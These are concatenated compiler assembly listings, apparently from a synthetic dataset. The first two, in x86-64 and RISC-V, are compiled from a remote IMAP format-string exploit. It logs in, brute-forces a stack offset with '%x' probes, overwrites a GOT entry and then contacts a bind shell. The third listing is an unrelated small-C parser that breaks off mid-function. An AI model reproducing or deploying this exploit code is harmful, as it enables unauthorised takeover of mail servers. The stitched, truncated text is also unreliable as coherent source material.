.L5-.L7 .long .L8-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L6-.L7 .section .text.startup .p2align 4,,10 .p2align 3 .L5: movq %rbp, %rsi movl %ebx, %edi call usage@PLT jmp .L4 .L6: movq optarg(%rip), %rdi call atoi@PLT movl %eax, %r13d jmp .L4 .L8: movq optarg(%rip), %rax movq %rax, 16(%rsp) jmp .L4 .L9: movq optarg(%rip), %rdi call strdup@PLT movq %rax, 8(%rsp) jmp .L4 .L10: movq optarg(%rip), %r15 jmp .L4 .p2align 4,,10 .p2align 3 .L73: movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movl PF_INET(%rip), %edi call socket@PLT movl %eax, %r12d testl %eax, %eax js .L74 .L13: movq 8(%rsp), %rcx leaq .LC0(%rip), %rax testq %rcx, %rcx cmovne %rcx, %rax testl %r13d, %r13d movq %rax, %rbx movq %rax, 8(%rsp) movl $143, %eax movq %rbx, %rdi cmove %eax, %r13d call ISIP@PLT testl %eax, %eax je .L75 movq 8(%rsp), %rdi call inet_addr@PLT movl %eax, 60(%rsp) .L18: movl AF_INET(%rip), %eax movl %r13d, %edi movl %eax, 56(%rsp) call htons@PLT movq 8(%rsp), %rdx movl stdout(%rip), %edi movl %r13d, %ecx movw %ax, 52(%rsp) leaq .LC5(%rip), %rsi xorl %eax, %eax call fprintf@PLT leaq 52(%rsp), %rsi movl $4, %edx movl %r12d, %edi call connect@PLT testq %rax, %rax js .L76 .L19: movl stdout(%rip), %edi xorl %eax, %eax xorl %r13d, %r13d xorl %r14d, %r14d leaq .LC7(%rip), %rsi leaq 64(%rsp), %rbp call fprintf@PLT movl stdout(%rip), %edi leaq .LC8(%rip), %rsi xorl %eax, %eax call fprintf@PLT movq 16(%rsp), %rdx movq %r15, %rcx movl %r12d, %edi leaq .LC9(%rip), %rsi xorl %eax, %eax movl $1, %r15d call send_message@PLT movl stdout(%rip), %edi leaq .LC10(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl $0, 16(%rsp) jmp .L20 .p2align 4,,10 .p2align 3 .L78: xorl %r13d, %r13d xorl %r14d, %r14d cmpb $49, 64(%rsp) je .L77 .L22: movq %rbp, %rdi call clean@PLT .L20: movl $512, %edx movq %rbp, %rsi movl %r12d, %edi call read@PLT testq %rax, %rax jle .L42 movl %r14d, %eax orl %r13d, %eax je .L78 leaq .LC15(%rip), %rbx movq %rbp, %rdi movq %rbx, %rsi call strstr@PLT testq %rax, %rax je .L24 cmpl $1, %r14d jne .L25 leaq 15(%rax), %rdi movl $8, %edx leaq .LC16(%rip), %rsi call strncmp@PLT testq %rax, %rax jne .L79 .L26: movl stdout(%rip), %edi movl %r15d, %edx xorl %eax, %eax xorl %r14d, %r14d leaq .LC17(%rip), %rsi call fprintf@PLT movl stdout(%rip), %edi leaq .LC18(%rip), %rsi xorl %eax, %eax call fprintf@PLT movq %rbp, %rdi call clean@PLT movq %rbx, %rsi movq %rbp, %rdi call strstr@PLT .L27: testq %rax, %rax jne .L25 .L28: movl 44(%rsp), %eax cmpl $-1073741824, %eax ja .L42 .L33: leaq 44(%rsp), %rbx addl $1, %eax movl $10, %esi movb $0, 48(%rsp) movq %rbx, %rdi movl %eax, 44(%rsp) call strchr@PLT testq %rax, %rax je .L36 .p2align 4,,10 .p2align 3 .L40: addl $1, 44(%rsp) movb $0, 48(%rsp) .L39: movq %rbx, %rdi call strlen@PLT cmpl $4, %eax jne .L40 cmpl $1, 16(%rsp) movl $1, %r13d je .L22 movq code(%rip), %r8 movl %r15d, %ecx movq %rbx, %rdx movl %r12d, %edi leaq .LC24(%rip), %rsi xorl %eax, %eax call send_message@PLT jmp .L22 .L75: movq %rbx, %rdi call gethostbyname@PLT movq %rax, %rbx testq %rax, %rax je .L80 .L17: movl 4(%rbx), %esi movl (%rbx), %edx leaq 60(%rsp), %rdi call memcpy@PLT movl 60(%rsp), %edi call inet_ntoa@PLT movq %rax, %rdi call strdup@PLT movq %rax, 8(%rsp) jmp .L18 .p2align 4,,10 .p2align 3 .L24: cmpl $1, %r13d jne .L22 jmp .L28 .p2align 4,,10 .p2align 3 .L79: addl $1, %r15d xorl %eax, %eax leaq .LC14(%rip), %rsi movl %r12d, %edi movl %r15d, %edx call send_message@PLT cmpl $1, %r13d jne .L22 movq %rbx, %rsi movq %rbp, %rdi call strstr@PLT jmp .L27 .p2align 4,,10 .p2align 3 .L77: movl stdout(%rip), %edi leaq .LC11(%rip), %rsi xorl %eax, %eax leaq .LC14(%rip), %r14 leaq .LC15(%rip), %rbx call fprintf@PLT leaq .LC12(%rip), %rsi movl %r12d, %edi xorl %eax, %eax call send_message@PLT movl stdout(%rip), %edi leaq .LC13(%rip), %rsi xorl %eax, %eax call fprintf@PLT movq %r14, %rsi movl %r12d, %edi xorl %eax, %eax movl %r15d, %edx call send_message@PLT movq %rbx, %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L69 leaq 15(%rax), %rdi movl $8, %edx leaq .LC16(%rip), %rsi call strncmp@PLT testq %rax, %rax je .L26 addl $1, %r15d movq %r14, %rsi movl %r12d, %edi xorl %eax, %eax movl %r15d, %edx call send_message@PLT .L69: movl $1, %r14d jmp .L22 .p2align 4,,10 .p2align 3 .L36: movl $13, %esi movq %rbx, %rdi call strchr@PLT testq %rax, %rax jne .L40 cmpb $0, 44(%rsp) je .L40 jmp .L39 .p2align 4,,10 .p2align 3 .L25: leaq 11(%rax), %rbx movq %rbp, %rdi xorl %r13d, %r13d call strlen@PLT movq %rbx, %rdi call strlen@PLT movl %r14d, 28(%rsp) movl 16(%rsp), %r14d jmp .L29 .p2align 4,,10 .p2align 3 .L30: addq $1, %rbx .L31: addl $1, %r13d .L29: movq %rbp, %rdi call strlen@PLT cmpl %r13d, %eax jle .L81 movq code(%rip), %rdi call strlen@PLT movq code(%rip), %rsi movq %rbx, %rdi movl %eax, %edx call strncmp@PLT testl %r14d, %r14d jne .L30 testq %rax, %rax jne .L30 movl 44(%rsp), %eax movl $2, %edi movl $1, %r14d leal -4(%r13,%rax), %eax movl %eax, 44(%rsp) call sleep@PLT movl 44(%rsp), %eax movl %r12d, %ecx movl %r15d, %edx movl got_entry(%rip), %edi leal 3(%rax), %esi movl %esi, 44(%rsp) call buildstring@PLT movl 44(%rsp), %edx movl stdout(%rip), %edi xorl %eax, %eax leaq .LC19(%rip), %rsi call fprintf@PLT movl %r12d, %edi call close@PLT movl stdout(%rip), %edi leaq .LC20(%rip), %rsi xorl %eax, %eax call fprintf@PLT movq 52(%rsp), %rsi movl 60(%rsp), %edx movq 8(%rsp), %rdi call comun@PLT testq %rax, %rax jns .L31 movl stderr(%rip), %edi leaq .LC21(%rip), %rsi xorl %eax, %eax call fprintf@PLT jmp .L31 .p2align 4,,10 .p2align 3 .L81: movl 44(%rsp), %eax movl %r14d, 16(%rsp) movl 28(%rsp), %r14d cmpl $-1073741824, %eax jbe .L33 .p2align 4,,10 .p2align 3 .L42: movl stderr(%rip), %edi leaq .LC22(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl %r12d, %edi call close@PLT movq 8(%rsp), %rdi call free@PLT movl 44(%rsp), %edx movl stderr(%rip), %edi xorl %eax, %eax leaq .LC23(%rip), %rsi call fprintf@PLT movl $0, 48(%rsp) movl 48(%rsp), %eax cmpl $4, %eax jg .L35 .p2align 4,,10 .p2align 3 .L34: movl 48(%rsp), %eax addl $1, %eax movl %eax, 48(%rsp) movl 48(%rsp), %eax cmpl $4, %eax jle .L34 .L35: movq 584(%rsp), %rax subq %fs:40, %rax jne .L82 addq $600, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L71: .cfi_restore_state movl %ebx, %edi movq %rbp, %rsi call usage@PLT movl EXIT_SUCCESS(%rip), %edi call exit@PLT jmp .L2 .L76: movl stderr(%rip), %edi leaq .LC6(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl EXIT_FAILURE(%rip), %edi call exit@PLT jmp .L19 .L74: movl stderr(%rip), %edi leaq .LC3(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl EXIT_FAILURE(%rip), %edi call exit@PLT jmp .L13 .L72: movl stderr(%rip), %edi leaq .LC1(%rip), %rsi call fprintf@PLT movl EXIT_FAILURE(%rip), %edi call exit@PLT jmp .L3 .L80: movl stderr(%rip), %edi leaq .LC4(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl EXIT_FAILURE(%rip), %edi call exit@PLT jmp .L17 .L82: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl optarg .align 8 .type optarg, @object .size optarg, 8 optarg: .zero 8 .globl got_entry .align 4 .type got_entry, @object .size got_entry, 4 got_entry: .zero 4 .globl code .align 8 .type code, @object .size code, 8 code: .zero 8 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl PF_INET .align 4 .type PF_INET, @object .size PF_INET, 4 PF_INET: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl EXIT_SUCCESS .align 4 .type EXIT_SUCCESS, @object .size EXIT_SUCCESS, 4 EXIT_SUCCESS: .zero 4 .globl EXIT_FAILURE .align 4 .type EXIT_FAILURE, @object .size EXIT_FAILURE, 4 EXIT_FAILURE: .zero 4 .globl EOF .align 4 .type EOF, @object .size EOF, 4 EOF: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_4452 .data .align 4 .type g_aug_volatile_4452, @object .size g_aug_volatile_4452, 4 g_aug_volatile_4452: .long 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_1234.c_main_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "localhost" .align 3 .LC1: .string "exp.c:115 Could not allocate memory\n" .align 3 .LC2: .string "h:p:l:a:" .align 3 .LC3: .string "exp.c:139 Error creating an new socket" .align 3 .LC4: .string "exp.c:152 Could not resolve ip address\n" .align 3 .LC5: .string "[+] Connecting to %s:%d\n" .align 3 .LC6: .string "[*] exp.c:178 Connection failed\n" .align 3 .LC7: .string "[+] Connected .. \n" .align 3 .LC8: .string "[+] Sending login ... \n" .align 3 .LC9: .string "1 LOGIN %s %s\r\n" .align 3 .LC10: .string "[+] Done ... \n" .align 3 .LC11: .string "[+] Selecting inbox ..\n" .align 3 .LC12: .string "2 Select inbox\n" .align 3 .LC13: .string "[+] Selecting Done .. Starting brute sequence\n" .align 3 .LC14: .string "3 search topic .AAAABBBB%%%d$x\n" .align 3 .LC15: .string "(near" .align 3 .LC16: .string "41414141" .align 3 .LC17: .string "[+] Found offset %d\n" .align 3 .LC18: .string "[+] Finding buffer on the stack\n" .align 3 .LC19: .string "[+] Decoy found at %p\n" .align 3 .LC20: .string "[+] Trying to contact the bind shell ..\n" .align 3 .LC21: .string "[-] Exploit failed\n" .align 3 .LC22: .string "[+] Closing connection\n" .align 3 .LC23: .string "[-] Exploit failed %p\n" .align 3 .LC24: .string "3 search topic .%s....%%%d$s%sCCCC\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-672 la a4,__stack_chk_guard ld a5, 0(a4) sd a5, 552(sp) li a5, 0 lw a5,.LANCHOR0 addiw a5,a5,-1 sw a5,.LANCHOR0,a4 li a5,134660096 sd s0,656(sp) sd s1,648(sp) sd s2,640(sp) sw a5,16(sp) sd ra,664(sp) sd s3,632(sp) sd s4,624(sp) sd s5,616(sp) sd s6,608(sp) sd s7,600(sp) sd s8,592(sp) sd s9,584(sp) sd s10,576(sp) sd s11,568(sp) mv s0,a0 mv s1,a1 call welcome@plt li a5,8 lla s2,.LANCHOR1 ble s0,a5,.L66 .L2: li a0,128 call malloc@plt mv s8,a0 beq a0,zero,.L67 .L3: li s6,0 lla s5,.LC2 li s9,26 lla s3,.L7 .L4: mv a2,s5 mv a1,s1 mv a0,s0 call getopt@plt lw a5,24(s2) beq a5,a0,.L68 .L12: addiw a0,a0,-86 sext.w a5,a0 bgtu a5,s9,.L5 slli a5,a0,32 srli a0,a5,30 add a0,a0,s3 lw a5,0(a0) add a5,a5,s3 jr a5 .section .rodata .align 2 .align 2 .L7: .word .L4-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L10-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L9-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L8-.L7 .word .L5-.L7 .word .L5-.L7 .word .L5-.L7 .word .L6-.L7 .section .text.startup .L5: mv a1,s1 mv a0,s0 call usage@plt mv a2,s5 mv a1,s1 mv a0,s0 call getopt@plt lw a5,24(s2) bne a5,a0,.L12 .L68: lw a2,28(s2) lw a1,32(s2) lw a0,36(s2) call socket@plt mv s5,a0 blt a0,zero,.L69 beq s8,zero,.L70 .L14: beq s6,zero,.L71 .L15: mv a0,s8 call ISIP@plt beq a0,zero,.L72 mv a0,s8 call inet_addr@plt sw a0,32(sp) .L18: lw a5,40(s2) mv a0,s6 sw a5,28(sp) call htons@plt mv a5,a0 lw a0,44(s2) mv a2,s8 lla a1,.LC5 mv a3,s6 sh a5,24(sp) call fprintf@plt li a2,4 addi a1,sp,24 mv a0,s5 call connect@plt blt a0,zero,.L73 .L19: lw a0,44(s2) lla a1,.LC7 li s11,0 call fprintf@plt lw a0,44(s2) lla a1,.LC8 li s6,0 call fprintf@plt mv a3,s7 mv a2,s4 lla a1,.LC9 mv a0,s5 call send_message@plt lw a0,44(s2) lla a1,.LC10 li s7,0 call fprintf@plt li s10,1 addi s1,sp,40 addi s3,sp,16 li s4,4 li s9,1 j .L20 .L75: lbu a4,40(sp) li a5,49 li s6,0 li s7,0 beq a4,a5,.L74 .L22: mv a0,s1 call clean@plt .L20: li a2,512 mv a1,s1 mv a0,s5 call read@plt ble a0,zero,.L42 or a5,s7,s6 beq a5,zero,.L75 lla a1,.LC15 mv a0,s1 call strstr@plt beq a0,zero,.L24 bne s7,s9,.L25 li a2,8 lla a1,.LC16 addi a0,a0,15 call strncmp@plt bne a0,zero,.L76 .L26: lw a0,44(s2) mv a2,s10 lla a1,.LC17 call fprintf@plt lw a0,44(s2) lla a1,.LC18 li s7,0 call fprintf@plt mv a0,s1 call clean@plt .L63: lla a1,.LC15 mv a0,s1 call strstr@plt bne a0,zero,.L25 .L28: lw a5,16(sp) li a4,-1073741824 bgtu a5,a4,.L42 addiw a5,a5,1 li a1,10 mv a0,s3 sw a5,16(sp) sb zero,20(sp) call strchr@plt beq a0,zero,.L36 .L40: lw a5,16(sp) sb zero,20(sp) addiw a5,a5,1 sw a5,16(sp) .L39: mv a0,s3 call strlen@plt bne a0,s4,.L40 li s6,1 beq s11,s9,.L22 ld a4,48(s2) mv a3,s10 mv a2,s3 lla a1,.LC24 mv a0,s5 call send_message@plt j .L22 .L6: ld a0,16(s2) call atoi@plt mv s6,a0 j .L4 .L8: ld s4,16(s2) j .L4 .L9: ld a0,16(s2) call strdup@plt mv s8,a0 j .L4 .L10: ld s7,16(s2) j .L4 .L72: mv a0,s8 call gethostbyname@plt mv s0,a0 beq a0,zero,.L77 .L17: lw a2,0(s0) lw a1,4(s0) addi a0,sp,32 call memcpy@plt lw a0,32(sp) call inet_ntoa@plt call strdup@plt mv s8,a0 j .L18 .L71: li s6,143 j .L15 .L70: lla s8,.LC0 bne s6,zero,.L15 j .L71 .L69: lw a0,4(s2) lla a1,.LC3 call fprintf@plt lw a0,8(s2) call exit@plt bne s8,zero,.L14 j .L70 .L24: bne s6,s9,.L22 j .L28 .L76: addiw s10,s10,1 mv a2,s10 lla a1,.LC14 mv a0,s5 call send_message@plt bne s6,s7,.L22 j .L63 .L74: lw a0,44(s2) lla a1,.LC11 call fprintf@plt lla a1,.LC12 mv a0,s5 call send_message@plt lw a0,44(s2) lla a1,.LC13 call fprintf@plt lla a1,.LC14 mv a2,s10 mv a0,s5 call send_message@plt lla a1,.LC15 mv a0,s1 call strstr@plt beq a0,zero,.L64 li a2,8 lla a1,.LC16 addi a0,a0,15 call strncmp@plt beq a0,zero,.L26 addiw s10,s10,1 mv a2,s10 lla a1,.LC14 mv a0,s5 call send_message@plt .L64: li s7,1 j .L22 .L36: li a1,13 mv a0,s3 call strchr@plt bne a0,zero,.L40 lbu a5,16(sp) beq a5,zero,.L40 j .L39 .L25: addi s0,a0,11 mv a0,s1 call strlen@plt mv a0,s0 call strlen@plt li s6,0 .L29: mv a0,s1 call strlen@plt ble a0,s6,.L28 ld a1,48(s2) mv a0,a1 sd a1,8(sp) call strlen@plt ld a1,8(sp) mv a2,a0 mv a0,s0 call strncmp@plt bne a0,zero,.L30 beq s11,s9,.L30 lw a5,16(sp) li a0,2 li s11,1 addiw a5,a5,-4 addw a5,a5,s6 sw a5,16(sp) call sleep@plt lw a5,16(sp) lw a0,56(s2) mv a3,s5 addiw a1,a5,3 mv a2,s10 sw a1,16(sp) call buildstring@plt lw a2,16(sp) lw a0,44(s2) lla a1,.LC19 call fprintf@plt mv a0,s5 call close@plt lw a0,44(s2) lla a1,.LC20 call fprintf@plt ld a1,24(sp) ld a2,32(sp) mv a0,s8 call comun@plt blt a0,zero,.L78 addiw s6,s6,1 j .L29 .L78: lw a0,4(s2) lla a1,.LC21 addiw s6,s6,1 call fprintf@plt j .L29 .L30: addi s0,s0,1 addiw s6,s6,1 j .L29 .L42: lw a0,4(s2) lla a1,.LC22 call fprintf@plt mv a0,s5 call close@plt mv a0,s8 call free@plt lw a2,16(sp) lw a0,4(s2) lla a1,.LC23 call fprintf@plt sw zero,20(sp) lw a3,20(sp) li a5,4 li a4,4 bgt a3,a5,.L35 .L34: lw a5,20(sp) addiw a5,a5,1 sw a5,20(sp) lw a5,20(sp) ble a5,a4,.L34 .L35: la a5,__stack_chk_guard ld a4, 552(sp) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L79 ld ra,664(sp) ld s0,656(sp) ld s1,648(sp) ld s2,640(sp) ld s3,632(sp) ld s4,624(sp) ld s5,616(sp) ld s6,608(sp) ld s7,600(sp) ld s8,592(sp) ld s9,584(sp) ld s10,576(sp) ld s11,568(sp) li a0,0 addi sp,sp,672 jr ra .L66: mv a1,s1 mv a0,s0 call usage@plt lw a0,0(s2) call exit@plt j .L2 .L73: lw a0,4(s2) lla a1,.LC6 call fprintf@plt lw a0,8(s2) call exit@plt j .L19 .L67: lw a0,4(s2) lla a1,.LC1 call fprintf@plt lw a0,8(s2) call exit@plt j .L3 .L77: lw a0,4(s2) lla a1,.LC4 call fprintf@plt lw a0,8(s2) call exit@plt j .L17 .L79: call __stack_chk_fail@plt .size main, .-main .globl stdout .globl stderr .globl optarg .globl got_entry .globl code .globl SOCK_STREAM .globl PF_INET .globl IPPROTO_TCP .globl EXIT_SUCCESS .globl EXIT_FAILURE .globl EOF .globl AF_INET .globl g_aug_volatile_4452 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_4452, @object .size g_aug_volatile_4452, 4 g_aug_volatile_4452: .word 8 .bss .align 3 .set .LANCHOR1,. + 0 .type EXIT_SUCCESS, @object .size EXIT_SUCCESS, 4 EXIT_SUCCESS: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type EXIT_FAILURE, @object .size EXIT_FAILURE, 4 EXIT_FAILURE: .zero 4 .zero 4 .type optarg, @object .size optarg, 8 optarg: .zero 8 .type EOF, @object .size EOF, 4 EOF: .zero 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type PF_INET, @object .size PF_INET, 4 PF_INET: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type code, @object .size code, 8 code: .zero 8 .type got_entry, @object .size got_entry, 4 got_entry: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_rlcc.c_main_aug_v3_7
.file "extr_rlcc.c_main_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "ident" .LC1: .string "number" .LC2: .string "character" .LC3: .string "string" .LC4: .string "factor" .LC5: .string "term" .LC6: .string "lexp" .LC7: .string "stmt" .LC8: .string "exp" .LC9: .string "vartype" .LC10: .string "typeident" .LC11: .string "decls" .LC12: .string "args" .LC13: .string "body" .LC14: .string "comment" .LC15: .string "linecomment" .LC16: .string "asm" .LC17: .string "procedure" .LC18: .string "cprocedure" .LC19: .string "sigdef" .LC20: .string "sigbody" .LC21: .string "includes" .LC22: .string "smallc" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC23: .ascii " ident : /[a-zA-Z_][a-zA-Z0-9_]*/ ; " .ascii " \n number : /[0-9]+/ ; " .ascii " \n character : /'.'/ ; " .ascii " \n string : /\"(\\\\.|[^\"])*\"/ ; " .ascii " \n " .ascii " \n factor : '(' <le" .ascii "xp> ')' \n |" .ascii " <number> \n " .ascii " | <character> " .ascii " \n | <string> " .ascii " \n | <ident> '(' <lexp>? (',' <lexp>)* '" .ascii ")' \n | <ident> ; " .ascii " \n " .ascii " \n term : <factor> ((" .ascii "'*' | '/' | '%') <factor>)* ; \n lexp : <te" .ascii "rm> (('+' | '-') <term>)* ; \n " .ascii " \n" .ascii " stmt : '{' <stmt>* '}' " .ascii " \n | \"while\" '(' <exp> ')' <stmt> " .ascii " \n | \"if\" '(' <exp> ')' <stmt> " .ascii " \n | <ident> '=' <lexp> ';' " .ascii " \n | \"print\" '(' <" .ascii "lexp>? ')' ';' \n | \"retur" .ascii "n\" <lexp>? ';' \n |" .ascii " <ident> '(' (<number>|<ident>|<string>)? (',' (<string>|<nu" .ascii "mber>|<ident>))* ')' ';' ; \n " .ascii " \n exp : <le" .ascii "xp> '>' <lexp> \n " .ascii " | <lexp> '<' <lexp> \n" .ascii " | <lexp> \">=\" <lexp> " .ascii " \n | <lexp> \"<=\" <lexp> " .ascii " \n | <lexp> \"!=\" <lexp> " .ascii " \n | <lexp> \"==\" <lexp> ; " .ascii " \n " .ascii " " .ascii " \n vartype : (\"int\" | \"char" .ascii "\") ; \n typeident : <vartype>" .ascii " <ident> ; \n decls : (" .ascii "<typeident> ';')* ; \n args " .ascii " : <typeident>? (',' <typeident>)* ; " .ascii "\n body : '{' <decls> <stmt>* '}' ; " .ascii " \n comment : /\\/\\*([^\\*])*\\*\\// ; " .ascii " \n linecomment : /\\/\\/([^\\n])*/ ; " .ascii " \n asm : /\\:([^\\n])*/ ; " .ascii " \n procedure : <ident> '@' \"glob" .ascii "al\" '(' <number>? ')' <body> ; \n cprocedure : <vartype> <i" .ascii "dent> '(' <args> ')' <body> ; \n sigdef : <ident> '@' <id" .ascii "ent> '(" .string "' <number> ')' ';' ; \n sigbody : '@' <ident> '(' <number> ')' ';' ; \n includes : (\"#include\" <string>)* ; \n smallc : /^/ (<comment>|<asm>|<linecomment>|<sigdef>|<sigbody>|<procedure>|<cprocedure>)* <includes> <decls> /$/ ; \n" .section .rodata.str1.1 .LC24: .string "; TAG = %s (%s)\n" .LC25: .string "<stdin>" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movl %edi, %r15d leaq .LC0(%rip), %rdi pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rsi, %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $200, %rsp .cfi_def_cfa_offset 256 movq %fs:40, %rax movq %rax, 184(%rsp) movl g_aug_volatile_6185(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_6185(%rip) call mpc_new@PLT leaq .LC1(%rip), %rdi movq %rax, %r14 call mpc_new@PLT leaq .LC2(%rip), %rdi movq %rax, 8(%rsp) call mpc_new@PLT leaq .LC3(%rip), %rdi movq %rax, %r13 call mpc_new@PLT leaq .LC4(%rip), %rdi movq %rax, 16(%rsp) call mpc_new@PLT leaq .LC5(%rip), %rdi movq %rax, 24(%rsp) call mpc_new@PLT leaq .LC6(%rip), %rdi movq %rax, 32(%rsp) call mpc_new@PLT leaq .LC7(%rip), %rdi movq %rax, 40(%rsp) call mpc_new@PLT leaq .LC8(%rip), %rdi movq %rax, 48(%rsp) call mpc_new@PLT leaq .LC9(%rip), %rdi movq %rax, 56(%rsp) call mpc_new@PLT leaq .LC10(%rip), %rdi movq %rax, 64(%rsp) call mpc_new@PLT leaq .LC11(%rip), %rdi movq %rax, 72(%rsp) call mpc_new@PLT leaq .LC12(%rip), %rdi movq %rax, 80(%rsp) call mpc_new@PLT leaq .LC13(%rip), %rdi movq %rax, 88(%rsp) call mpc_new@PLT leaq .LC14(%rip), %rdi movq %rax, 96(%rsp) call mpc_new@PLT leaq .LC15(%rip), %rdi movq %rax, 104(%rsp) call mpc_new@PLT leaq .LC16(%rip), %rdi movq %rax, %rbp call mpc_new@PLT leaq .LC17(%rip), %rdi movq %rax, 152(%rsp) call mpc_new@PLT leaq .LC18(%rip), %rdi movq %rax, 112(%rsp) call mpc_new@PLT leaq .LC19(%rip), %rdi movq %rax, 120(%rsp) call mpc_new@PLT leaq .LC20(%rip), %rdi movq %rax, 128(%rsp) call mpc_new@PLT leaq .LC21(%rip), %rdi movq %rax, 144(%rsp) call mpc_new@PLT leaq .LC22(%rip), %rdi movq %rax, 136(%rsp) call mpc_new@PLT pushq $0 .cfi_def_cfa_offset 264 movq %r13, %r8 movq %r14, %rdx pushq %rax .cfi_def_cfa_offset 272 movq %rax, %rbx pushq 152(%rsp) .cfi_def_cfa_offset 280 movq 168(%rsp), %rsi pushq %rsi .cfi_def_cfa_offset 288 leaq .LC23(%rip), %rsi pushq 160(%rsp) .cfi_def_cfa_offset 296 pushq 160(%rsp) .cfi_def_cfa_offset 304 pushq 160(%rsp) .cfi_def_cfa_offset 312 movq 208(%rsp), %rcx pushq %rcx .cfi_def_cfa_offset 320 pushq %rbp .cfi_def_cfa_offset 328 pushq 176(%rsp) .cfi_def_cfa_offset 336 pushq 176(%rsp) .cfi_def_cfa_offset 344 pushq 176(%rsp) .cfi_def_cfa_offset 352 pushq 176(%rsp) .cfi_def_cfa_offset 360 pushq 176(%rsp) .cfi_def_cfa_offset 368 pushq 176(%rsp) .cfi_def_cfa_offset 376 pushq 176(%rsp) .cfi_def_cfa_offset 384 pushq 176(%rsp) .cfi_def_cfa_offset 392 pushq 176(%rsp) .cfi_def_cfa_offset 400 movl MPCA_LANG_DEFAULT(%rip), %edi pushq 176(%rsp) .cfi_def_cfa_offset 408 pushq 176(%rsp) .cfi_def_cfa_offset 416 movq 176(%rsp), %r9 movq 168(%rsp), %rcx call mpca_lang@PLT addq $160, %rsp .cfi_def_cfa_offset 256 testq %rax, %rax je .L2 movq %rax, %rdi movq %rax, 144(%rsp) call mpc_err_print@PLT movq 144(%rsp), %rdi call mpc_err_delete@PLT movl $1, %edi call exit@PLT .L2: testl %r15d, %r15d jle .L3 movq 8(%r12), %rdi leaq 160(%rsp), %rdx movq %rbx, %rsi call mpc_parse_contents@PLT testq %rax, %rax je .L9 movl stderr(%rip), %esi movq 168(%rsp), %rdi call mpc_ast_print_to@PLT movq 168(%rsp), %r15 cmpl $0, (%r15) jle .L5 xorl %ebp, %ebp .p2align 4,,10 .p2align 3 .L6: movq 16(%r15), %rax leaq .LC24(%rip), %rdi movq (%rax,%rbp,8), %r12 addq $1, %rbp movl 4(%r12), %edx movl 8(%r12), %esi call eprintf@PLT movq %r12, %rdi call processNode@PLT cmpl %ebp, (%r15) jg .L6 movq 168(%rsp), %r15 .L5: movq %r15, %rdi call mpc_ast_delete@PLT jmp .L8 .L9: movq 160(%rsp), %rdi call mpc_err_print@PLT movq 160(%rsp), %rdi call mpc_err_delete@PLT .L8: subq $8, %rsp .cfi_def_cfa_offset 264 movq %r13, %rcx movq %r14, %rsi movl $17, %edi pushq %rbx .cfi_def_cfa_offset 272 pushq 152(%rsp) .cfi_def_cfa_offset 280 pushq 152(%rsp) .cfi_def_cfa_offset 288 pushq 152(%rsp) .cfi_def_cfa_offset 296 pushq 152(%rsp) .cfi_def_cfa_offset 304 pushq 152(%rsp) .cfi_def_cfa_offset 312 pushq 152(%rsp) .cfi_def_cfa_offset 320 pushq 152(%rsp) .cfi_def_cfa_offset 328 pushq 152(%rsp) 